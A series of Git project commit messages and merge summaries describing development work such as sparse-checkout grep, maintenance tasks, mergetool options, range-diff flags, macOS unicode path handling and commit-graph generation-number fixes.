Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This function can be simplified by using the `test_oid_to_path()`
helper, which incidentally also makes it more robust by not relying on
the exact file system layout of the loose object files.
While at it, do not define those functions in a test case, it buys us
nothing.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
On a sparse checked out repository, `git grep` (without --cached) ends
up searching the cache when an entry matches the search pathspec and has
the SKIP_WORKTREE bit set. This is confusing both because the sparse
paths are not expected to be in a working tree search (as they are not
checked out), and because the output mixes working tree and cache
results without distinguishing them. (Note that grep also resorts to the
cache on working tree searches that include --assume-unchanged paths.
But the whole point in that case is to assume that the contents of the
index entry and the file are the same. This does not apply to the case
of sparse paths, where the file isn't even expected to be present.)
Fix that by teaching grep to honor the sparse-checkout rules for working
tree searches. If the user wants to grep paths outside the current
sparse-checkout definition, they may either update the sparsity rules to
materialize the files, or use --cached to search all blobs registered in
the index.
Note: it might also be interesting to add a configuration option that
allow users to search paths that are present despite having the
SKIP_WORKTREE bit set, and/or to restrict searches in the index and past
revisions too. These ideas are left as future improvements to avoid
conflicting with other sparse-checkout topics currently in flight.
Suggested-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Reviewed-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When the 'maintenance.strategy' config option is set to 'incremental',
a default maintenance schedule is enabled. Add the 'pack-refs' task to
that strategy at the weekly cadence.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It is valuable to collect loose refs into a more compressed form. This
is typically the packed-refs file, although this could be the reftable
in the future. Having packed refs can be extremely valuable in repos
with many tags or remote branches that are not modified by the local
user, but still are necessary for other queries.
For instance, with many exploded refs, commands such as
git describe --tags --exact-match HEAD
can be very slow (multiple seconds). This command in particular is used
by terminal prompts to show when a detatched HEAD is pointing to an
existing tag, so having it be slow causes significant delays for users.
Add a new 'pack-refs' maintenance task. It runs 'git pack-refs --all
--prune' to move loose refs into a packed form. For now, that is the
packed-refs file, but could adjust to other file formats in the future.
This is the first of several sub-tasks of the 'gc' task that could be
extracted to their own tasks. In this process, we should not change the
behavior of the 'gc' task since that remains the default way to keep
repositories maintained. Creating a new task for one of these sub-tasks
only provides more customization options for those choosing to not use
the 'gc' task. It is certainly possible to have both the 'gc' and
'pack-refs' tasks enabled and run regularly. While they may repeat
effort, they do not conflict in a destructive way.
The 'auto_condition' function pointer is left NULL for now. We could
extend this in the future to have a condition check if pack-refs should
be run during 'git maintenance run --auto'.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
die() messages are traced in trace2, but BUG() messages are not. Anyone
tracking die() messages would have even more reason to track BUG().
Therefore, write to trace2 when BUG() is invoked.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Helped-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a per-tool override flag so that users may enable the flag for one
tool and disable it for another by setting
`mergetool.<tool>.hideResolved` to `false`.
In addition, the author or maintainer of a mergetool may optionally
override the default `hideResolved` value for that mergetool. If the
`mergetools/<tool>` shell script contains a `hide_resolved_enabled`
function it will be called when the mergetool is invoked and the return
value will be used as the default for the `hideResolved` flag.
hide_resolved_enabled () {
return 1
}
Disabling may be desirable if the mergetool wants or needs access to the
original, unmodified 'LOCAL' and 'REMOTE' versions of the conflicted
file. For example:
- A tool may use a custom conflict resolution algorithm and prefer to
ignore the results of Git's conflict resolution.
- A tool may want to visually compare/constrast the version of the file
from before the merge (saved to 'LOCAL', 'REMOTE', and 'BASE') with
Git's conflict resolution results (saved to 'MERGED').
Helped-by: Johannes Sixt <j6t@kdbg.org>
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Seth House <seth@eseth.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This is preparation for the following commit where we need to source the
mergetool shell script to look for overrides before `run_merge_tool` is
called. Previously `run_merge_tool` both sourced that script and invoked
the mergetool.
In the case of the following commit, we need the result of the
`hide_resolved` override, if present, before we actually run
`run_merge_tool`.
The new `initialize_merge_tool` wrapper is exposed and documented as
a public interface for consistency with the existing `run_merge_tool`
which is also public. Although `setup_tool` could instead be exposed
directly, the related `setup_user_tool` would probably also want to be
elevated to match and this felt the cleanest to me.
Signed-off-by: Seth House <seth@eseth.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The purpose of a mergetool is to help the user resolve any conflicts
that Git cannot automatically resolve. If there is a conflict that must
be resolved manually Git will write a file named MERGED which contains
everything Git was able to resolve by itself and also everything that it
was not able to resolve wrapped in conflict markers.
One way to think of MERGED is as a two- or three-way diff. If each
"side" of the conflict markers is separately extracted an external tool
can represent those conflicts as a side-by-side diff.
However many mergetools instead diff LOCAL and REMOTE both of which
contain versions of the file from before the merge. Since the conflicts
Git resolved automatically are not present it forces the user to
manually re-resolve those conflicts. Some mergetools also show MERGED
but often only for reference and not as the focal point to resolve the
conflicts.
This adds a `mergetool.hideResolved` flag that will overwrite LOCAL and
REMOTE with each corresponding "side" of a conflicted file and thus hide
all conflicts that Git was able to resolve itself. Overwriting these
files will immediately benefit any mergetool that uses them without
requiring any changes to the tool.
No adverse effects were noted in a small survey of popular mergetools[1]
so this behavior defaults to `true`. However it can be globally disabled
by setting `mergetool.hideResolved` to `false`.
[1] https://www.eseth.org/2020/mergetools.htmlc884424769/2020/mergetools.md
Original-implementation-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Seth House <seth@eseth.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
One of the conveniences that test_commit offers is making a tag for each
commit. This makes it easy to refer to the commits in subsequent
commands. But it can also be a pain if you care about reachability,
because those tags keep the commits reachable even if they are rewound
from the branch they're made on.
The alternative is that scripts have to call test_tick, git-add, and
git-commit themselves. Let's add a --no-tag option to give them the
one-liner convenience of using test_commit.
This is in preparation for the next patch, which will add some more
calls. But I cleaned up an existing site to show off the feature. There
are probably more cleanups possible.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The options --untracked and --cached are not compatible, but if they are
used together, grep just silently ignores --cached and searches the
working tree. Error out, instead, to avoid any potential confusion.
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Reviewed-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
GitHub Actions is transitioning workflow steps that run on
'ubuntu-latest' from 18.04 to 20.04 [1].
This works fine in all steps except the static-analysis one, since
Coccinelle isn't available on Ubuntu focal (it is only available in the
universe suite).
Until Coccinelle can be installed from 20.04's main suite, pin the
static-analysis build to run on 18.04, where it can be installed by
default.
[1]: https://github.com/actions/virtual-environments/issues/1816
Reported-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our setting of GitHub CI test jobs were a bit too eager to give up
once there is even one failure found. Tweak the knob to allow
other jobs keep running even when we see a failure, so that we can
find more failures in a single run.
* pb/ci-matrix-wo-shortcut:
ci: do not cancel all jobs of a matrix if one fails
The implementation of "git branch --sort" wrt the detached HEAD
display has always been hacky, which has been cleaned up.
* ab/branch-sort:
branch: show "HEAD detached" first under reverse sort
branch: sort detached HEAD based on a flag
ref-filter: move ref_sorting flags to a bitfield
ref-filter: move "cmp_fn" assignment into "else if" arm
ref-filter: add braces to if/else if/else chain
branch tests: add to --sort tests
branch: change "--local" to "--list" in comment
Code clean-up.
* ma/t1300-cleanup:
t1300: don't needlessly work with `core.foo` configs
t1300: remove duplicate test for `--file no-such-file`
t1300: remove duplicate test for `--file ../foo`
A 3-year old test that was not testing anything useful has been
corrected.
* fc/t6030-bisect-reset-removes-auxiliary-files:
test: bisect-porcelain: fix location of files
There are three forms, depending whether the user specifies one, two or
three non-option arguments. We've never actually explained how this
works in the manual, so let's explain it.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the `SPECIFYING RANGES` section of gitrevisions[7], two ways are
described to specify commit ranges that `range-diff` does not yet
accept: "<commit>^!" and "<commit>^-<n>".
Let's accept them, by parsing them via the revision machinery and
looking for at least one interesting and one uninteresting revision in
the resulting `pending` array.
This also finally lets us reject arguments that _do_ contain `..` but
are not actually ranges, e.g. `HEAD^{/do.. match this}`.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When comparing commit ranges, one is frequently interested only in one
side, such as asking the question "Has this patch that I submitted to
the Git mailing list been applied?": one would only care about the part
of the output that corresponds to the commits in a local branch.
To make that possible, imitate the `git rev-list` options `--left-only`
and `--right-only`.
This addresses https://github.com/gitgitgadget/git/issues/206
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It is actually only the `output()` function that uses those diffopts. By
moving the diffopt initialization down into that function, it is
encapsulated better.
Incidentally, it will also make it easier to implement the `--left-only`
and `--right-only` options in `git range-diff` because the `output()`
function is now receiving all range-diff options as a parameter, not
just the diffopts.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This will make it easier to implement the `--left-only` and
`--right-only` options.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We've carried compatibility codepaths for compilers without
variadic macros for quite some time, but the world may be ready for
them to be removed. Force compilation failure on exotic platforms
where variadic macros are not available to find out who screams in
such a way that we can easily revert if it turns out that the world
is not yet ready.
* jk/weather-balloon-require-variadic-macro:
git-compat-util: always enable variadic macros
Our setting of GitHub CI test jobs were a bit too eager to give up
once there is even one failure found. Tweak the knob to allow
other jobs keep running even when we see a failure, so that we can
find more failures in a single run.
* pb/ci-matrix-wo-shortcut:
ci: do not cancel all jobs of a matrix if one fails
The "pack-objects" command needs to iterate over all the tags when
automatic tag following is enabled, but it actually iterated over
all refs and then discarded everything outside "refs/tags/"
hierarchy, which was quite wasteful.
* jv/pack-objects-narrower-ref-iteration:
builtin/pack-objects.c: avoid iterating all refs
When removing many branches and tags, the code used to do so one
ref at a time. There is another API it can use to delete multiple
refs, and it makes quite a lot of performance difference when the
refs are packed.
* ph/use-delete-refs:
use delete_refs when deleting tags or branches
The ls-refs protocol operation has been optimized to narrow the
sub-hierarchy of refs/ it walks to produce response.
* tb/ls-refs-optim:
ls-refs.c: traverse prefixes of disjoint "ref-prefix" sets
ls-refs.c: initialize 'prefixes' before using it
refs: expose 'for_each_fullref_in_prefixes'
"git ls-files" can and does show multiple entries when the index is
unmerged, which is a source for confusion unless -s/-u option is in
use. A new option --deduplicate has been introduced.
* zh/ls-files-deduplicate:
ls-files.c: add --deduplicate option
ls_files.c: consolidate two for loops into one
ls_files.c: bugfix for --deleted and --modified
Document, clean-up and optimize the code around the cache-tree
extension in the index.
* ds/cache-tree-basics:
cache-tree: speed up consecutive path comparisons
cache-tree: use ce_namelen() instead of strlen()
index-format: discuss recursion of cache-tree better
index-format: update preamble to cache tree extension
index-format: use 'cache tree' over 'cached tree'
cache-tree: trace regions for prime_cache_tree
cache-tree: trace regions for I/O
cache-tree: use trace2 in cache_tree_update()
unpack-trees: add trace2 regions
tree-walk: report recursion counts
ORT merge strategy learns more support for merge conflicts.
* en/ort-conflict-handling:
merge-ort: add handling for different types of files at same path
merge-ort: copy find_first_merges() implementation from merge-recursive.c
merge-ort: implement format_commit()
merge-ort: copy and adapt merge_submodule() from merge-recursive.c
merge-ort: copy and adapt merge_3way() from merge-recursive.c
merge-ort: flesh out implementation of handle_content_merge()
merge-ort: handle book-keeping around two- and three-way content merge
merge-ort: implement unique_path() helper
merge-ort: handle directory/file conflicts that remain
merge-ort: handle D/F conflict where directory disappears due to merge
"git log" learned a new "--diff-merges=<how>" option.
* so/log-diff-merge: (32 commits)
t4013: add tests for --diff-merges=first-parent
doc/git-show: include --diff-merges description
doc/rev-list-options: document --first-parent changes merges format
doc/diff-generate-patch: mention new --diff-merges option
doc/git-log: describe new --diff-merges options
diff-merges: add '--diff-merges=1' as synonym for 'first-parent'
diff-merges: add old mnemonic counterparts to --diff-merges
diff-merges: let new options enable diff without -p
diff-merges: do not imply -p for new options
diff-merges: implement new values for --diff-merges
diff-merges: make -m/-c/--cc explicitly mutually exclusive
diff-merges: refactor opt settings into separate functions
diff-merges: get rid of now empty diff_merges_init_revs()
diff-merges: group diff-merge flags next to each other inside 'rev_info'
diff-merges: split 'ignore_merges' field
diff-merges: fix -m to properly override -c/--cc
t4013: add tests for -m failing to override -c/--cc
t4013: support test_expect_failure through ':failure' magic
diff-merges: revise revs->diff flag handling
diff-merges: handle imply -p on -c/--cc logic for log.c
...
When more than one commit with the same patch ID appears on one
side, "git log --cherry-pick A...B" did not exclude them all when a
commit with the same patch ID appears on the other side. Now it
does.
* jk/log-cherry-pick-duplicate-patches:
patch-ids: handle duplicate hashmap entries
Newline characters in the host and path part of git:// URL are
now forbidden.
* jk/forbid-lf-in-git-url:
fsck: reject .gitmodules git:// urls with newlines
git_connect_git(): forbid newlines in host and path
Comments update.
* ab/gettext-charset-comment-fix:
gettext.c: remove/reword a mostly-useless comment
Makefile: remove a warning about old GETTEXT_POISON flag
Fix 2.29 regression where "git mergetool --tool-help" fails to list
all the available tools.
* pb/mergetool-tool-help-fix:
mergetool--lib: fix '--tool-help' to correctly show available tools
"git for-each-repo --config=<var> <cmd>" should not run <cmd> for
any repository when the configuration variable <var> is not defined
even once.
* ds/for-each-repo-noopfix:
for-each-repo: do nothing on empty config
Some tests expect that "ls -l" output has either '-' or 'x' for
group executable bit, but setgid bit can be inherited from parent
directory and make these fields 'S' or 's' instead, causing test
failures.
* mt/t4129-with-setgid-dir:
t4129: don't fail if setgid is set in the test directory
"git stash" did not work well in a sparsely checked out working
tree.
* en/stash-apply-sparse-checkout:
stash: fix stash application in sparse-checkouts
stash: remove unnecessary process forking
t7012: add a testcase demonstrating stash apply bugs in sparse checkouts
In preparation for creating an API around file formats using chunks and
tables of contents, prepare the commit-graph write code to use
prototypes that will match this new API.
Specifically, convert chunk_write_fn to take a "void *data" parameter
instead of the commit-graph-specific "struct write_commit_graph_context"
pointer.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Teach Git to use the "unborn" feature introduced in a previous patch as
follows: Git will always send the "unborn" argument if it is supported
by the server. During "git clone", if cloning an empty repository, Git
will use the new information to determine the local branch to create. In
all other cases, Git will ignore it.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a future patch we plan to return the name of an unborn current branch
from deep in the callchain to a caller via a new pointer parameter that
points at a variable in the caller when the caller calls
get_remote_refs() and transport_get_remote_refs().
In preparation for that, encapsulate the existing ref_prefixes
parameter into a struct. The aforementioned unborn current branch will
go into this new struct in the future patch.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When cloning, we choose the default branch based on the remote HEAD.
But if there is no remote HEAD reported (which could happen if the
target of the remote HEAD is unborn), we'll fall back to using our local
init.defaultBranch. Traditionally this hasn't been a big deal, because
most repos used "master" as the default. But these days it is likely to
cause confusion if the server and client implementations choose
different values (e.g., if the remote started with "main", we may choose
"master" locally, create commits there, and then the user is surprised
when they push to "master" and not "main").
To solve this, the remote needs to communicate the target of the HEAD
symref, even if it is unborn, and "git clone" needs to use this
information.
Currently, symrefs that have unborn targets (such as in this case) are
not communicated by the protocol. Teach Git to advertise and support the
"unborn" feature in "ls-refs" (by default, this is advertised, but
server administrators may turn this off through the lsrefs.unborn
config). This feature indicates that "ls-refs" supports the "unborn"
argument; when it is specified, "ls-refs" will send the HEAD symref with
the name of its unborn target.
This change is only for protocol v2. A similar change for protocol v0
would require independent protocol design (there being no analogous
position to signal support for "unborn") and client-side plumbing of the
data required, so the scope of this patch set is limited to protocol v2.
The client side will be updated to use this in a subsequent commit.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Move rationale for new hash function to beginning of document
so that it appears before the concrete move to SHA-256 is described.
Remove some of the details about SHA-1 weaknesses and add references
to the details on how the new hash function was chosen instead.
Signed-off-by: Thomas Ackermann <th.acker@arcor.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use SHA-1 and SHA-256 instead of sha1 and sha256 when referring
to the hash type.
Signed-off-by: Thomas Ackermann <th.acker@arcor.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Asciidoc requires lists to start with an empty line and uses
different characters for indentation levels ("-", "*", "**", ...).
For special symbols like a dash "--" has to be used and there is
no double arrow "<->", so a left and right arrow "<-->" has to be
combined for that. Lastly for verbatim output a newline followed
by an indentation has to be used.
Fix asciidoc output for lists, special characters and verbatim
text while retaining the readabilty of the original text file.
Signed-off-by: Thomas Ackermann <th.acker@arcor.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Previously, we waited for the child process to be finished in every
failing code path as well as at the end of the function
`show_range_diff()`.
However, we do not need to wait that long. Directly after reading the
output of the child process, we can wrap up the child process.
This also has the advantage that we don't do a bunch of unnecessary work
in case `finish_command()` returns with an error anyway.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In library functions, we do want to avoid the (simple, but rather final)
`die()` calls, instead returning with a value indicating an error.
Let's do exactly that in the code introduced in b66885a30c
(range-diff: add section header instead of diff header, 2019-07-11) that
wants to error out if a diff header could not be parsed.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the code paths in question, we already release a lot of memory, but
the `current_filename` variable was missed. Fix that.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The .use_shell flag in struct child_process that is passed to
run_command() API has been clarified with a bit more documentation.
* jk/run-command-use-shell-doc:
run-command: document use_shell option
Test clean-up plus UI improvement by hiding extra refs that
the prefetch task uses from "log --decorate" output.
* ds/maintenance-prefetch-cleanup:
t7900: clean up some broken refs
maintenance: set log.excludeDecoration durin prefetch
Reimplement the `bisect_skip()` shell function in C and also add
`bisect-skip` subcommand to `git bisect--helper` to call it from
git-bisect.sh
Using `--bisect-skip` subcommand is a temporary measure to port shell
function to C so as to use the existing test suite.
Mentored-by: Lars Schneider <larsxschneider@gmail.com>
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Signed-off-by: Pranit Bauva <pranit.bauva@gmail.com>
Signed-off-by: Tanushree Tumane <tanushreetumane@gmail.com>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use `res` variable to store `bisect_reset()` output in BISECT_RESET
case option to make bisect--helper.c more consistent.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Reimplement the `bisect_replay` shell function in C and also add
`--bisect-replay` subcommand to `git bisect--helper` to call it from
git-bisect.sh
Using `--bisect-replay` subcommand is a temporary measure to port shell
function to C so as to use the existing test suite.
Mentored-by: Lars Schneider <larsxschneider@gmail.com>
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Signed-off-by: Pranit Bauva <pranit.bauva@gmail.com>
Signed-off-by: Tanushree Tumane <tanushreetumane@gmail.com>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The description for "-c" is hard to parse. I think the big issue is lack
of commas, but I've also reordered the words to keep the main focus
point of "instead of renaming, copy" together.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We didn't special-case "branch -M" (with a capital M) the same as
"branch -m", nor any of the "--copy" variants. As a result these offered
any ref as the next candidate, and not just branch names.
Note that I rewrapped case-arm line since it's now quite long, and
likewise the one below it for consistency. I also re-ordered the
existing "-D" to make it more obvious how the cases group together.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The following sequence leads to a "BUG" assertion running under MacOS:
DIR=git-test-restore-p
Adiarnfd=$(printf 'A\314\210')
DIRNAME=xx${Adiarnfd}yy
mkdir $DIR &&
cd $DIR &&
git init &&
mkdir $DIRNAME &&
cd $DIRNAME &&
echo "Initial" >file &&
git add file &&
echo "One more line" >>file &&
echo y | git restore -p .
Initialized empty Git repository in /tmp/git-test-restore-p/.git/
BUG: pathspec.c:495: error initializing pathspec_item
Cannot close git diff-index --cached --numstat
[snip]
The command `git restore` is run from a directory inside a Git repo.
Git needs to split the $CWD into 2 parts:
The path to the repo and "the rest", if any.
"The rest" becomes a "prefix" later used inside the pathspec code.
As an example, "/path/to/repo/dir-inside-repå" would determine
"/path/to/repo" as the root of the repo, the place where the
configuration file .git/config is found.
The rest becomes the prefix ("dir-inside-repå"), from where the
pathspec machinery expands the ".", more about this later.
If there is a decomposed form, (making the decomposing visible like this),
"dir-inside-rep°a" doesn't match "dir-inside-repå".
Git commands need to:
(a) read the configuration variable "core.precomposeunicode"
(b) precocompose argv[]
(c) precompose the prefix, if there was any
The first commit,
76759c7dff "git on Mac OS and precomposed unicode"
addressed (a) and (b).
The call to precompose_argv() was added into parse-options.c,
because that seemed to be a good place when the patch was written.
Commands that don't use parse-options need to do (a) and (b) themselfs.
The commands `diff-files`, `diff-index`, `diff-tree` and `diff`
learned (a) and (b) in
commit 90a78b83e0 "diff: run arguments through precompose_argv"
Branch names (or refs in general) using decomposed code points
resulting in decomposed file names had been fixed in
commit 8e712ef6fc "Honor core.precomposeUnicode in more places"
The bug report from above shows 2 things:
- more commands need to handle precomposed unicode
- (c) should be implemented for all commands using pathspecs
Solution:
precompose_argv() now handles the prefix (if needed), and is renamed into
precompose_argv_prefix().
Inside this function the config variable core.precomposeunicode is read
into the global variable precomposed_unicode, as before.
This reading is skipped if precomposed_unicode had been read before.
The original patch for preocomposed unicode, 76759c7dff, placed
precompose_argv() into parse-options.c
Now add it into git.c::run_builtin() as well. Existing precompose
calls in diff-files.c and others may become redundant, and if we
audit the callflows that reach these places to make sure that they
can never be reached without going through the new call added to
run_builtin(), we might be able to remove these existing ones.
But in this commit, we do not bother to do so and leave these
precompose callsites as they are. Because precompose() is
idempotent and can be called on an already precomposed string
safely, this is safer than removing existing calls without fully
vetting the callflows.
There is certainly room for cleanups - this change intends to be a bug fix.
Cleanups needs more tests in e.g. t/t3910-mac-os-precompose.sh, and should
be done in future commits.
[1] git-bugreport-2021-01-06-1209.txt (git can't deal with special characters)
[2] https://lore.kernel.org/git/A102844A-9501-4A86-854D-E3B387D378AA@icloud.com/
Reported-by: Daniel Troger <random_n0body@icloud.com>
Helped-By: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Torsten Bögershausen <tboegi@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The former offers not just branches but tags as completion
candidates.
Mimic how "branch -d" limits its suggestion to branch names.
Reported-by: Paul Jolly <paul@myitcv.io>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Apply a few leftover improvements from the review of ad5df6b782
(upload-pack.c: fix filter spec quoting bug).
1. Instead of enumerating objects reachable from HEAD, enumerate all
reachable objects, because HEAD has not special significance in this
test.
2. Instead of relying on the knowledge that "? in rev-list output
means partial clone", explicitly verify that there are no blobs with
cat-file.
Signed-off-by: Jacob Vosmaer <jacob@gitlab.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When git invokes a pager that exits with non-zero the common case is
that we'll already return the correct SIGPIPE failure from git itself,
but the exit code logged in trace2 has always been incorrectly
reported[1]. Fix that and log the correct exit code in the logs.
Since this gives us something to test outside of our recently-added
tests needing a !MINGW prerequisite, let's refactor the test to run on
MINGW and actually check for SIGPIPE outside of MINGW.
The wait_or_whine() is only called with a true "in_signal" from from
finish_command_in_signal(), which in turn is only used in pager.c.
The "in_signal && !WIFEXITED(status)" case is not covered by
tests. Let's log the default -1 in that case for good measure.
1. The incorrect logging of the exit code in was seemingly copy/pasted
into finish_command_in_signal() in ee4512ed48 (trace2: create new
combined trace facility, 2019-02-22)
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add braces to an "if" block in the wait_or_whine() function. This
isn't needed now, but will make a subsequent commit easier to read.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add tests for how git behaves when the pager itself exits with
non-zero, as well as for us exiting with 141 when we're killed with
SIGPIPE due to the pager not consuming its output.
There is some recent discussion[1] about these semantics, but aside
from what we want to do in the future, we should have a test for the
current behavior.
This test construct is stolen from 7559a1be8a (unblock and unignore
SIGPIPE, 2014-09-18). The reason not to make the test itself depend on
the MINGW prerequisite is to make a subsequent commit easier to read.
1. https://lore.kernel.org/git/87o8h4omqa.fsf@evledraar.gmail.com/
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Refactor the wait_for_pager() function. Since 507d7804c0 (pager:
don't use unsafe functions in signal handlers, 2015-09-04) the
wait_for_pager() and wait_for_pager_atexit() callers diverged on more
than they shared.
Let's extract the common code into a new close_pager_fds() helper, and
move the parts unique to the only to callers to those functions.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Before checking if the repository has a commit-graph loaded, be sure
to run prepare_commit_graph(). This is necessary because otherwise
the topo_levels slab is not initialized. As we compute topo_levels for
the new commits, we iterate further into the lower layers since the
first visit to each commit looks as though the topo_level is not
populated.
By properly initializing the topo_slab, we fix the previously broken
case of a split commit graph where a base layer has the
generation_data_overflow chunk.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When upgrading to a commit-graph with corrected commit dates from
one without, there are a few things that need to be considered.
When computing generation numbers for the new commit-graph file that
expects to add the generation_data chunk with corrected commit
dates, we need to ensure that the 'generation' member of the
commit_graph_data struct is set to zero for these commits.
Unfortunately, the fallback to use topological level for generation
number when corrected commit dates are not available are causing us
harm here: parsing commits notices that read_generation_data is
false and populates 'generation' with the topological level.
The solution is to iterate through the commits, parse the commits
to populate initial values, then reset the generation values to
zero to trigger recalculation. This loop only occurs when the
existing commit-graph data has no corrected commit dates.
While this improves our situation somewhat, we have not completely
solved the issue for correctly computing generation numbers for mixed
layers. That follows in the next change.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The compute_generation_numbers() method was introduced by 3258c663
(commit-graph: compute generation numbers, 2018-05-01) to compute what
is now known as "topological levels". These are still stored in the
commit-graph file for compatibility sake while c1a09119 (commit-graph:
implement corrected commit date, 2021-01-16) updated the method to also
compute the new version of generation numbers: corrected commit date.
It makes sense why these are grouped. They perform very similar walks of
the necessary commits and compute similar maximums over each parent.
However, having these two together conflates them in subtle ways that is
hard to separate.
In particular, the topo_level slab is used to store the topological
levels in all cases, but the commit_graph_data_at(c)->generation member
stores different values depending on the state of the existing
commit-graph file.
* If the existing commit-graph file has a "GDAT" chunk, then these
values represent corrected commit dates.
* If the existing commit-graph file doesn't have a "GDAT" chunk, then
these values are actually the topological levels.
This issue only occurs only when upgrading an existing commit-graph file
into one that has the "GDAT" chunk. The current change does not resolve
this upgrade problem, but splitting the implementation into two pieces
here helps with that process, which will follow in the next change.
The important thing this helps with is the case where the
num_generation_data_overflows was being incremented incorrectly,
triggering a write of the overflow chunk.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We need to be extra careful that we don't use corrected
commit dates from any layer of a commit-graph chain if there is a
single commit-graph file that is missing the generation_data chunk.
Update validate_mixed_generation_chain() to correctly update each
layer to ignore the generation_data chunk in this case. It now also
returns 1 if all layers have a generation_data chunk. This return
value will be used in the next change.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There is a subtle failure happening when computing corrected commit
dates with --split enabled. It requires a base layer needing the
generation_data_overflow chunk. Then, the next layer on top
erroneously thinks it needs an overflow chunk due to a bug leading
to recalculating all reachable generation numbers. The output of
the failure is
BUG: commit-graph.c:1912: expected to write 8 bytes to
chunk 47444f56, but wrote 0 instead
These "expected" 8 bytes are due to re-computing the corrected
commit date for the lower layer but the new layer does not need
any overflow.
Add a test to t5318-commit-graph.sh that demonstrates this bug. However,
it does not trigger consistently with the existing code.
The generation number data is stored in a slab and accessed by
commit_graph_data_at(). This data is initialized when parsing a commit,
